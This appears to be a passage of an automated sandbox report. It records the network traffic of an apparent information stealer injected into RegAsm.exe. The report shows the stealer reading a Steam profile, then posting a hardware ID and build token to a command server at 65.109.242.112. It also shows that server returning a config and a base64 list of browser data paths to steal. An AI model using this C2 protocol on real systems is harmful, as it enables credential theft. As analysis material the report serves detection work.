                                                                                                                                                                                                                                                                May 12, 2024 12:47:37.408562899 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:38.068639040 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:38.068718910 CEST49757443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:38.069097996 CEST49757443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:38.069112062 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:38.069288015 CEST49757443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:38.069293022 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.145603895 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.145674944 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.145674944 CEST49757443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.145720005 CEST49757443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.146457911 CEST49757443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.146475077 CEST4434975765.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.448554039 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.448604107 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.448692083 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.448942900 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:39.448955059 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.109572887 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.109689951 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110390902 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110400915 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110568047 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110572100 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110649109 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110661983 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110742092 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110753059 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110764980 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110771894 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110829115 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110845089 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110856056 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110862017 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110871077 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110944986 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.110956907 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.111042023 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.111049891 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.111057997 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:40.111062050 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.338761091 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.338819027 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.338824987 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.338867903 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.338974953 CEST49758443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.338989973 CEST4434975865.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.341953993 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.341978073 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.342039108 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.342216015 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:42.342225075 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:43.002867937 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:43.002950907 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:43.003313065 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:43.003318071 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:43.003477097 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:43.003480911 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100075006 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100142002 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100152016 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100162029 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100197077 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.751997948 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.752022028 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.758944988 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.758992910 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.759057999 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.759886980 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.759901047 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.419538975 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.419631958 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420058966 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420067072 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420268059 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420272112 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516797066 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516865015 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516896009 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516952038 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.517334938 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.517350912 CEST4434976065.109.242.112192.168.2.4

                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.229378939 CEST4996353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.392379999 CEST53499631.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.229378939 CEST192.168.2.41.1.1.10xea63Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                May 12, 2024 12:46:52.392379999 CEST1.1.1.1192.168.2.40xea63No error (0)steamcommunity.com23.195.238.96A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                                • 65.109.242.112

                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.44973023.195.238.964432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:46:52 UTC119OUTGET /profiles/76561199681720597 HTTP/1.1
                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:46:53 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:46:53 GMT
                                                                                                                                                                                                                                                                Content-Length: 34771
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: sessionid=8893f98f6202e706a47b296a; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C314f2a9d7d7f8b4caec0756e81716fc0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                2024-05-12 10:46:53 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                                2024-05-12 10:46:53 UTC10062INData Raw: 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61
                                                                                                                                                                                                                                                                Data Ascii: <a class="menuitem supernav" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': fa
                                                                                                                                                                                                                                                                2024-05-12 10:46:53 UTC10195INData Raw: 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f
                                                                                                                                                                                                                                                                Data Ascii: &quot;,&quot;COMMUNITY_CDN_URL&quot;:&quot;https:\/\/community.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                1192.168.2.44973165.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:46:54 UTC234OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:46:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:46:55 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:46:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.44973265.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:46:55 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 279
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:46:55 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 38 46 44 30 42 35 43 31 37 36 32 37 37 38 39 30 34 39 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                                                Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="hwid"1B8FD0B5C1762778904926-a33c7340-61ca-11ee-8c18-806e6f6e6963------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------
                                                                                                                                                                                                                                                                2024-05-12 10:46:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:46:56 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:46:56 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|0|b234ce191d907593296ee88b6793a7e5|1|1|1|0|0|50000|00


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.44973365.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:46:57 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJD
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:46:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------ECFHCGHJDBFIIDGDHIJDCont
                                                                                                                                                                                                                                                                2024-05-12 10:46:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:46:58 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:46:58 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                4192.168.2.44973465.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:46:59 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:46:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------BAEBGCFIEHCFIDGCAAFBCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:00 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
